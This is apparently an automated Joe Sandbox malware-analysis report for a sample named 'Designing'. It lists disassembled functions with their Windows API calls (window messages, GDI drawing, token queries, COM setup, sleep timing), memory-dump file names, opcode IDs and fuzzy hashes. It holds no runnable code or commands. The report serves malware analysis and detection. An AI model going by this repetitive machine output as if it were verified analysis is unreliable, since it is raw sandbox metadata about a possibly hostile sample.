                                              • Source File: 0000000A.00000002.2896340275.0000000000B31000.00000020.00000001.01000000.00000005.sdmp, Offset: 00B30000, based on PE: true
                                              • Associated: 0000000A.00000002.2896291842.0000000000B30000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2896406370.0000000000BC0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2896406370.0000000000BE6000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2896463455.0000000000BF0000.00000004.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2896485559.0000000000BF9000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_10_2_b30000_Designing.jbxd
                                              Similarity
                                              • API ID: MessagePostSleep$RectWindow
                                              • String ID:
                                              • API String ID: 3382505437-0
                                              • Opcode ID: 2c3118948dbbbd8e1f544fe650935c79fae55460c5792cc013bb4600fa8c8966
                                              • Instruction ID: 01c6b55bb6d9ca309021a685b95489a6d5cc4ca48de9201db0704b659fbed148
                                              • Opcode Fuzzy Hash: 2c3118948dbbbd8e1f544fe650935c79fae55460c5792cc013bb4600fa8c8966
                                              • Instruction Fuzzy Hash: 2831FF71900219EFDF10DF68D94CAAE7BB5FB44315F144268F924AB1E0D7B09920CB90
                                              Function 00B8BD85 Relevance: 7.6, APIs: 5, Instructions: 88windowCOMMON
                                              Download Yara Rule
                                              APIs
                                              • IsWindowVisible.USER32(?), ref: 00B8BD9D
                                              • SendMessageW.USER32(?,0000000E,00000000,00000000), ref: 00B8BDBA
                                              • SendMessageW.USER32(?,0000000D,00000001,00000000), ref: 00B8BDF2
                                              • CharUpperBuffW.USER32(00000000,00000000,?,?,?,?), ref: 00B8BE18
                                              • _wcsstr.LIBCMT ref: 00B8BE22
                                              Memory Dump Source
                                              • Source File: 0000000A.00000002.2896340275.0000000000B31000.00000020.00000001.01000000.00000005.sdmp, Offset: 00B30000, based on PE: true
                                              • Associated: 0000000A.00000002.2896291842.0000000000B30000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2896406370.0000000000BC0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2896406370.0000000000BE6000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2896463455.0000000000BF0000.00000004.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2896485559.0000000000BF9000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_10_2_b30000_Designing.jbxd
                                              Similarity
                                              • API ID: MessageSend$BuffCharUpperVisibleWindow_wcsstr
                                              • String ID:
                                              • API String ID: 3902887630-0
                                              • Opcode ID: 1631f3d899c2a0e0da1b47887371646d76dfc758a1c4ed708fef884d07e8a931
                                              • Instruction ID: 2e4b672365e2a43e6a05a60e79afca78dfafd0e48a83d5f976736113b4795403
                                              • Opcode Fuzzy Hash: 1631f3d899c2a0e0da1b47887371646d76dfc758a1c4ed708fef884d07e8a931
                                              • Instruction Fuzzy Hash: B521C232208204BEEB256F399C49EBB7BD8DF49761F1044B9FD09DA1A1EF619C50D3A0
                                              Function 00BBB7BD Relevance: 7.6, APIs: 5, Instructions: 85COMMON
                                              Download Yara Rule
                                              APIs
                                                • Part of subcall function 00B329E2: GetWindowLongW.USER32(?,000000EB), ref: 00B329F3
                                              • GetWindowLongW.USER32(?,000000F0), ref: 00BBB804
                                              • SetWindowLongW.USER32(00000000,000000F0,00000001), ref: 00BBB829
                                              • SetWindowLongW.USER32(00000000,000000EC,000000FF), ref: 00BBB841
                                              • GetSystemMetrics.USER32(00000004), ref: 00BBB86A
                                              • SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000047,?,?,?,?,?,?,?,00BA155C,00000000), ref: 00BBB888
                                              Memory Dump Source
                                              • Source File: 0000000A.00000002.2896340275.0000000000B31000.00000020.00000001.01000000.00000005.sdmp, Offset: 00B30000, based on PE: true
                                              • Associated: 0000000A.00000002.2896291842.0000000000B30000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2896406370.0000000000BC0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2896406370.0000000000BE6000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2896463455.0000000000BF0000.00000004.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2896485559.0000000000BF9000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_10_2_b30000_Designing.jbxd
                                              Similarity
                                              • API ID: Window$Long$MetricsSystem
                                              • String ID:
                                              • API String ID: 2294984445-0
                                              • Opcode ID: 84fe508c0667cc3ae73586ce5418b951bb6609e0a458edb6fc82feafe8c18461
                                              • Instruction ID: 005f952bf43f0b5c5cbab1ec41c8ffed27efc1bf32a3cea061dd84258abc0d89
                                              • Opcode Fuzzy Hash: 84fe508c0667cc3ae73586ce5418b951bb6609e0a458edb6fc82feafe8c18461
                                              • Instruction Fuzzy Hash: 2A215E71924255AFCB149F398C48EBA37E8EB45724F204669F925D71E0DBB09810DB90
                                              Function 00B89EBF Relevance: 7.6, APIs: 5, Instructions: 84windowCOMMON
                                              Download Yara Rule
                                              APIs
                                              • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00B89ED8
                                                • Part of subcall function 00B41821: _memmove.LIBCMT ref: 00B4185B
                                              • SendMessageW.USER32(?,0000102C,00000000,00000002), ref: 00B89F0A
                                              • __itow.LIBCMT ref: 00B89F22
                                              • SendMessageW.USER32(?,0000102C,00000000,00000002), ref: 00B89F4A
                                              • __itow.LIBCMT ref: 00B89F5B
                                              Memory Dump Source
                                              • Source File: 0000000A.00000002.2896340275.0000000000B31000.00000020.00000001.01000000.00000005.sdmp, Offset: 00B30000, based on PE: true
                                              • Associated: 0000000A.00000002.2896291842.0000000000B30000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2896406370.0000000000BC0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2896406370.0000000000BE6000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2896463455.0000000000BF0000.00000004.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2896485559.0000000000BF9000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_10_2_b30000_Designing.jbxd
                                              Similarity
                                              • API ID: MessageSend$__itow$_memmove
                                              • String ID:
                                              • API String ID: 2983881199-0
                                              • Opcode ID: 7923eae403107cb3c8449aa291ce236fe1cd7399c89727240ef7e582042ba9a6
                                              • Instruction ID: fda17b78c021a51fa9e39997c644bce5f618d6a883fd8f4d10e4e1b077cb74f2
                                              • Opcode Fuzzy Hash: 7923eae403107cb3c8449aa291ce236fe1cd7399c89727240ef7e582042ba9a6
                                              • Instruction Fuzzy Hash: DB21B331A04204BBDF14BAA48C8AEBE7BECEB89751F0840A5FE01E7251DA70D945D7E1
                                              Function 00BA6138 Relevance: 7.6, APIs: 5, Instructions: 70COMMON
                                              Download Yara Rule
                                              APIs
                                              • IsWindow.USER32(00000000), ref: 00BA6159
                                              • GetForegroundWindow.USER32 ref: 00BA6170
                                              • GetDC.USER32(00000000), ref: 00BA61AC
                                              • GetPixel.GDI32(00000000,?,00000003), ref: 00BA61B8
                                              • ReleaseDC.USER32(00000000,00000003), ref: 00BA61F3
                                              Memory Dump Source
                                              • Source File: 0000000A.00000002.2896340275.0000000000B31000.00000020.00000001.01000000.00000005.sdmp, Offset: 00B30000, based on PE: true
                                              • Associated: 0000000A.00000002.2896291842.0000000000B30000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2896406370.0000000000BC0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2896406370.0000000000BE6000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2896463455.0000000000BF0000.00000004.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2896485559.0000000000BF9000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_10_2_b30000_Designing.jbxd
                                              Similarity
                                              • API ID: Window$ForegroundPixelRelease
                                              • String ID:
                                              • API String ID: 4156661090-0
                                              • Opcode ID: bf0812b6a364395dd4743e2d5dba52b4692a032aad572e48d781a3b58b82b093
                                              • Instruction ID: 50a86286a36b508f859f181691fca881d479d7f26f075a9b40cbaf95732a1f6a
                                              • Opcode Fuzzy Hash: bf0812b6a364395dd4743e2d5dba52b4692a032aad572e48d781a3b58b82b093
                                              • Instruction Fuzzy Hash: 78216F75A10204EFD714EF65DD84A9ABBF9EF89311F1484B9E94A97352CA70AC00CB90
                                              Function 00B316CF Relevance: 7.6, APIs: 5, Instructions: 67COMMON
                                              Download Yara Rule
                                              APIs
                                              • ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,00000000), ref: 00B31729
                                              • SelectObject.GDI32(?,00000000), ref: 00B31738
                                              • BeginPath.GDI32(?), ref: 00B3174F
                                              • SelectObject.GDI32(?,00000000), ref: 00B31778
                                              Memory Dump Source
                                              • Source File: 0000000A.00000002.2896340275.0000000000B31000.00000020.00000001.01000000.00000005.sdmp, Offset: 00B30000, based on PE: true
                                              • Associated: 0000000A.00000002.2896291842.0000000000B30000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2896406370.0000000000BC0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2896406370.0000000000BE6000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2896463455.0000000000BF0000.00000004.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2896485559.0000000000BF9000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_10_2_b30000_Designing.jbxd
                                              Similarity
                                              • API ID: ObjectSelect$BeginCreatePath
                                              • String ID:
                                              • API String ID: 3225163088-0
                                              • Opcode ID: 102a3002d04e8f02154baa890a5ba4462a901cda11e80b41fe7cd2ede9061f27
                                              • Instruction ID: 32d6c264f12dc1b324581637f1e81a75e242d7bea9ed554342a71d3231d4fce9
                                              • Opcode Fuzzy Hash: 102a3002d04e8f02154baa890a5ba4462a901cda11e80b41fe7cd2ede9061f27
                                              • Instruction Fuzzy Hash: 4621AC70814208EBDB10DF6ADD49B797BE8FB003A1F2846D6F815971A0DF709CA2CB90
                                              Function 00B8C837 Relevance: 7.6, APIs: 5, Instructions: 61COMMON
                                              Download Yara Rule
                                              APIs
                                              Memory Dump Source
                                              • Source File: 0000000A.00000002.2896340275.0000000000B31000.00000020.00000001.01000000.00000005.sdmp, Offset: 00B30000, based on PE: true
                                              • Associated: 0000000A.00000002.2896291842.0000000000B30000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2896406370.0000000000BC0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2896406370.0000000000BE6000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2896463455.0000000000BF0000.00000004.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2896485559.0000000000BF9000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_10_2_b30000_Designing.jbxd
                                              Similarity
                                              • API ID: _memcmp
                                              • String ID:
                                              • API String ID: 2931989736-0
                                              • Opcode ID: 4a759c97bf9bdbd5dee7100285f2664a8eb6c2e94e06dab824a4f33d7da4620a
                                              • Instruction ID: 8ddbe0966b27c248a6df48f56be3c8471a6a591494d2cb4f2515603eef5c7fe4
                                              • Opcode Fuzzy Hash: 4a759c97bf9bdbd5dee7100285f2664a8eb6c2e94e06dab824a4f33d7da4620a
                                              • Instruction Fuzzy Hash: 6401D2A2A802053BD20072149C82FBB6BDCDA20784F04C0E9FE0696652F770EE14C3F1
                                              Function 00B9504E Relevance: 7.6, APIs: 5, Instructions: 56synchronizationthreadwindowCOMMON
                                              Download Yara Rule
                                              APIs
                                              • GetCurrentThreadId.KERNEL32 ref: 00B95075
                                              • __beginthreadex.LIBCMT ref: 00B95093
                                              • MessageBoxW.USER32(?,?,?,?), ref: 00B950A8
                                              • WaitForSingleObject.KERNEL32(00000000,000000FF,?,?,?,?), ref: 00B950BE
                                              • CloseHandle.KERNEL32(00000000,?,?,?,?), ref: 00B950C5
                                              Memory Dump Source
                                              • Source File: 0000000A.00000002.2896340275.0000000000B31000.00000020.00000001.01000000.00000005.sdmp, Offset: 00B30000, based on PE: true
                                              • Associated: 0000000A.00000002.2896291842.0000000000B30000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2896406370.0000000000BC0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2896406370.0000000000BE6000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2896463455.0000000000BF0000.00000004.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2896485559.0000000000BF9000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_10_2_b30000_Designing.jbxd
                                              Similarity
                                              • API ID: CloseCurrentHandleMessageObjectSingleThreadWait__beginthreadex
                                              • String ID:
                                              • API String ID: 3824534824-0
                                              • Opcode ID: fa460e279401901e2f2b7dfa047b98b82cbc1c811e977538c020257957ec6008
                                              • Instruction ID: 824213ffec1a02087ccd5f0220dc28f6dfeee4421c6f52b9151aa7afd85cb956
                                              • Opcode Fuzzy Hash: fa460e279401901e2f2b7dfa047b98b82cbc1c811e977538c020257957ec6008
                                              • Instruction Fuzzy Hash: 3B11E572908748ABCB119BA89C04AAF7BACEB49320F1442AAF814D3360DA71894487F0
                                              Function 00B88E20 Relevance: 7.5, APIs: 5, Instructions: 49memoryCOMMON
                                              Download Yara Rule
                                              APIs
                                              • GetUserObjectSecurity.USER32(?,00000004,?,00000000,?), ref: 00B88E3C
                                              • GetLastError.KERNEL32(?,00B88900,?,?,?), ref: 00B88E46
                                              • GetProcessHeap.KERNEL32(00000008,?,?,00B88900,?,?,?), ref: 00B88E55
                                              • HeapAlloc.KERNEL32(00000000,?,00B88900,?,?,?), ref: 00B88E5C
                                              • GetUserObjectSecurity.USER32(?,00000004,00000000,?,?), ref: 00B88E73
                                              Memory Dump Source
                                              • Source File: 0000000A.00000002.2896340275.0000000000B31000.00000020.00000001.01000000.00000005.sdmp, Offset: 00B30000, based on PE: true
                                              • Associated: 0000000A.00000002.2896291842.0000000000B30000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2896406370.0000000000BC0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2896406370.0000000000BE6000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2896463455.0000000000BF0000.00000004.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2896485559.0000000000BF9000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_10_2_b30000_Designing.jbxd
                                              Similarity
                                              • API ID: HeapObjectSecurityUser$AllocErrorLastProcess
                                              • String ID:
                                              • API String ID: 842720411-0
                                              • Opcode ID: 67339bdb0477023da810717587712d27901eb65203d4975af0da8d858b2b6f24
                                              • Instruction ID: d5d780a684c00a601667811b047edd60aec93eb80ebe177011bf1140aad7be1b
                                              • Opcode Fuzzy Hash: 67339bdb0477023da810717587712d27901eb65203d4975af0da8d858b2b6f24
                                              • Instruction Fuzzy Hash: 99016D70210204FFDB206FA6EC48D6B7BADEF89355B540569F949C3220DE319C11DB60
                                              Function 00B957FF Relevance: 7.5, APIs: 5, Instructions: 48sleepCOMMON
                                              Download Yara Rule
                                              APIs
                                              • QueryPerformanceCounter.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 00B9581B
                                              • QueryPerformanceFrequency.KERNEL32(?,?,?,?,?,?,?,?,?,?,?), ref: 00B95829
                                              • Sleep.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?), ref: 00B95831
                                              • QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,?,?,?,?), ref: 00B9583B
                                              • Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 00B95877
                                              Memory Dump Source
                                              • Source File: 0000000A.00000002.2896340275.0000000000B31000.00000020.00000001.01000000.00000005.sdmp, Offset: 00B30000, based on PE: true
                                              • Associated: 0000000A.00000002.2896291842.0000000000B30000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2896406370.0000000000BC0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2896406370.0000000000BE6000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2896463455.0000000000BF0000.00000004.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2896485559.0000000000BF9000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_10_2_b30000_Designing.jbxd
                                              Similarity
                                              • API ID: PerformanceQuery$CounterSleep$Frequency
                                              • String ID:
                                              • API String ID: 2833360925-0
                                              • Opcode ID: 53fae64ef4a1d8015af62138e3f35fe1795b8375659433de707ef4f4cdd2b513
                                              • Instruction ID: 214ef087890ab7cba2359bab3623aafd5367ebb44bbbd1a4f82b5c75959d64a2
                                              • Opcode Fuzzy Hash: 53fae64ef4a1d8015af62138e3f35fe1795b8375659433de707ef4f4cdd2b513
                                              • Instruction Fuzzy Hash: 76015771C41A1DDBCF20AFE9E8889EDBBB8FB0C711F0141A6E501B2150DF309550CBA1
                                              Function 00B87D28 Relevance: 7.5, APIs: 5, Instructions: 48stringCOMMON
                                              Download Yara Rule
                                              APIs
                                              • CLSIDFromProgID.OLE32(?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,00B87C62,80070057,?,?,?,00B88073), ref: 00B87D45
                                              • ProgIDFromCLSID.OLE32(?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,00B87C62,80070057,?,?), ref: 00B87D60
                                              • lstrcmpiW.KERNEL32(?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,00B87C62,80070057,?,?), ref: 00B87D6E
                                              • CoTaskMemFree.OLE32(00000000,?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,00B87C62,80070057,?), ref: 00B87D7E
                                              • CLSIDFromString.OLE32(?,?,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,00B87C62,80070057,?,?), ref: 00B87D8A
                                              Memory Dump Source
                                              • Source File: 0000000A.00000002.2896340275.0000000000B31000.00000020.00000001.01000000.00000005.sdmp, Offset: 00B30000, based on PE: true
                                              • Associated: 0000000A.00000002.2896291842.0000000000B30000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2896406370.0000000000BC0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2896406370.0000000000BE6000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2896463455.0000000000BF0000.00000004.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2896485559.0000000000BF9000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_10_2_b30000_Designing.jbxd
                                              Similarity
                                              • API ID: From$Prog$FreeStringTasklstrcmpi
                                              • String ID:
                                              • API String ID: 3897988419-0
                                              • Opcode ID: 15d7778e367b28a78e28fa2e457f628bc3f1ac9c990441e58529edf0d4a5efe2
                                              • Instruction ID: 3a0c9164049389a7eb1b34b9323e46a7fc351b0307b83be4f67d5cb65a0e61ae
                                              • Opcode Fuzzy Hash: 15d7778e367b28a78e28fa2e457f628bc3f1ac9c990441e58529edf0d4a5efe2
                                              • Instruction Fuzzy Hash: A0015AB2615215EBDB116F54DC44BAABBEDEF88796F248064F908D7220DB71ED40CBA0
                                              Function 00B88CC7 Relevance: 7.5, APIs: 5, Instructions: 45memoryCOMMON
                                              Download Yara Rule
                                              APIs
                                              • GetTokenInformation.ADVAPI32(?,00000002,?,00000000,?), ref: 00B88CDE
                                              • GetLastError.KERNEL32(?,00000002,?,00000000,?), ref: 00B88CE8
                                              • GetProcessHeap.KERNEL32(00000008,?,?,00000002,?,00000000,?), ref: 00B88CF7
                                              • HeapAlloc.KERNEL32(00000000,?,00000002,?,00000000,?), ref: 00B88CFE
                                              • GetTokenInformation.ADVAPI32(?,00000002,00000000,?,?,?,00000002,?,00000000,?), ref: 00B88D14
                                              Memory Dump Source
                                              • Source File: 0000000A.00000002.2896340275.0000000000B31000.00000020.00000001.01000000.00000005.sdmp, Offset: 00B30000, based on PE: true
                                              • Associated: 0000000A.00000002.2896291842.0000000000B30000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2896406370.0000000000BC0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2896406370.0000000000BE6000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2896463455.0000000000BF0000.00000004.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2896485559.0000000000BF9000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_10_2_b30000_Designing.jbxd
                                              Similarity
                                              • API ID: HeapInformationToken$AllocErrorLastProcess
                                              • String ID:
                                              • API String ID: 44706859-0
                                              • Opcode ID: baf7725066c478bd848ec20159d2b390384d419391e147b8f348e23124d60bc0
                                              • Instruction ID: d5a8077290c9415da30edd649258c6581f36d0fa7dfe2018f47d36fc8ee49ded
                                              • Opcode Fuzzy Hash: baf7725066c478bd848ec20159d2b390384d419391e147b8f348e23124d60bc0
                                              • Instruction Fuzzy Hash: C9F0A934210209BFEB112FA59C88E6B3BACFF8D754F504029FA04C71A0CF60AC01DB60
                                              Function 00B88D28 Relevance: 7.5, APIs: 5, Instructions: 45memoryCOMMON
                                              Download Yara Rule
                                              APIs
                                              • GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),?,00000000,?), ref: 00B88D3F
                                              • GetLastError.KERNEL32(?,TokenIntegrityLevel,?,00000000,?), ref: 00B88D49
                                              • GetProcessHeap.KERNEL32(00000008,?,?,TokenIntegrityLevel,?,00000000,?), ref: 00B88D58
                                              • HeapAlloc.KERNEL32(00000000,?,TokenIntegrityLevel,?,00000000,?), ref: 00B88D5F
                                              • GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),00000000,?,?,?,TokenIntegrityLevel,?,00000000,?), ref: 00B88D75
                                              Memory Dump Source
                                              • Source File: 0000000A.00000002.2896340275.0000000000B31000.00000020.00000001.01000000.00000005.sdmp, Offset: 00B30000, based on PE: true
                                              • Associated: 0000000A.00000002.2896291842.0000000000B30000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2896406370.0000000000BC0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2896406370.0000000000BE6000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2896463455.0000000000BF0000.00000004.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2896485559.0000000000BF9000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_10_2_b30000_Designing.jbxd
                                              Similarity
                                              • API ID: HeapInformationToken$AllocErrorLastProcess
                                              • String ID:
                                              • API String ID: 44706859-0
                                              • Opcode ID: d98ac74fc4065704e78fa45ab28d4b77b48c6a61e084b127d23cae7996343741
                                              • Instruction ID: a1ed7c6d528db72edc6c74fe244f0eabc015003c358f4bb9174cda2a653dadc3
                                              • Opcode Fuzzy Hash: d98ac74fc4065704e78fa45ab28d4b77b48c6a61e084b127d23cae7996343741
                                              • Instruction Fuzzy Hash: CDF0AF30250204EFEB112FA9EC88F673BACEF89755F440529F944C31A0CF609D01DB60
                                              Function 00B8CD7C Relevance: 7.5, APIs: 5, Instructions: 41windowtimeCOMMON
                                              Download Yara Rule
                                              APIs
                                              • GetDlgItem.USER32(?,000003E9), ref: 00B8CD90
                                              • GetWindowTextW.USER32(00000000,?,00000100), ref: 00B8CDA7
                                              • MessageBeep.USER32(00000000), ref: 00B8CDBF
                                              • KillTimer.USER32(?,0000040A), ref: 00B8CDDB
                                              • EndDialog.USER32(?,00000001), ref: 00B8CDF5
                                              Memory Dump Source
                                              • Source File: 0000000A.00000002.2896340275.0000000000B31000.00000020.00000001.01000000.00000005.sdmp, Offset: 00B30000, based on PE: true
                                              • Associated: 0000000A.00000002.2896291842.0000000000B30000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2896406370.0000000000BC0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2896406370.0000000000BE6000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2896463455.0000000000BF0000.00000004.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2896485559.0000000000BF9000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_10_2_b30000_Designing.jbxd
                                              Similarity
                                              • API ID: BeepDialogItemKillMessageTextTimerWindow
                                              • String ID:
                                              • API String ID: 3741023627-0
                                              • Opcode ID: 7c2f9fbdcca6b7e068685a1000312f98a33000065612c5d610190cd298fade0e
                                              • Instruction ID: da7978f56dc6cd19cd7ed7f3664f84f31667e9fa7bc91368b7ec22ca171a6c6b
                                              • Opcode Fuzzy Hash: 7c2f9fbdcca6b7e068685a1000312f98a33000065612c5d610190cd298fade0e
                                              • Instruction Fuzzy Hash: C5016270510704ABEB217F64DD8EFA67FB8FB04705F0006B9A582A21E1DBF0A954CB90
                                              Function 00B3178C Relevance: 7.5, APIs: 5, Instructions: 29COMMON
                                              Download Yara Rule
                                              APIs
                                              • EndPath.GDI32(?), ref: 00B3179B
                                              • StrokeAndFillPath.GDI32(?,?,00B6BBC9,00000000,?), ref: 00B317B7
                                              • SelectObject.GDI32(?,00000000), ref: 00B317CA
                                              • DeleteObject.GDI32 ref: 00B317DD
                                              • StrokePath.GDI32(?), ref: 00B317F8
                                              Memory Dump Source
                                              • Source File: 0000000A.00000002.2896340275.0000000000B31000.00000020.00000001.01000000.00000005.sdmp, Offset: 00B30000, based on PE: true
                                              • Associated: 0000000A.00000002.2896291842.0000000000B30000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2896406370.0000000000BC0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2896406370.0000000000BE6000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2896463455.0000000000BF0000.00000004.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2896485559.0000000000BF9000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_10_2_b30000_Designing.jbxd
                                              Similarity
                                              • API ID: Path$ObjectStroke$DeleteFillSelect
                                              • String ID:
                                              • API String ID: 2625713937-0
                                              • Opcode ID: 1662b1269e4b59a45a3ea323686775b36838c7efc05a053b1f8dedc42625e477
                                              • Instruction ID: c67b4f990130914dae5395144fecb391fe8d5d62c898f76a65c5e6ec332b242b
                                              • Opcode Fuzzy Hash: 1662b1269e4b59a45a3ea323686775b36838c7efc05a053b1f8dedc42625e477
                                              • Instruction Fuzzy Hash: A7F0EC70058208EBDB11AF2AEC4CB693FA8E7043A6F188294F469571F0CF314DA5DF11
                                              Function 00B9C9DA Relevance: 7.3, APIs: 3, Strings: 1, Instructions: 279comCOMMON
                                              Download Yara Rule
                                              APIs
                                              • CoInitialize.OLE32(00000000), ref: 00B9CA75
                                              • CoCreateInstance.OLE32(00BC3D3C,00000000,00000001,00BC3BAC,?), ref: 00B9CA8D
                                                • Part of subcall function 00B41A36: _memmove.LIBCMT ref: 00B41A77
                                              • CoUninitialize.OLE32 ref: 00B9CCFA
                                              Strings
                                              Memory Dump Source
                                              • Source File: 0000000A.00000002.2896340275.0000000000B31000.00000020.00000001.01000000.00000005.sdmp, Offset: 00B30000, based on PE: true
                                              • Associated: 0000000A.00000002.2896291842.0000000000B30000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2896406370.0000000000BC0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2896406370.0000000000BE6000.00000002.00000001.01000000.00000005.sdmpDownload File
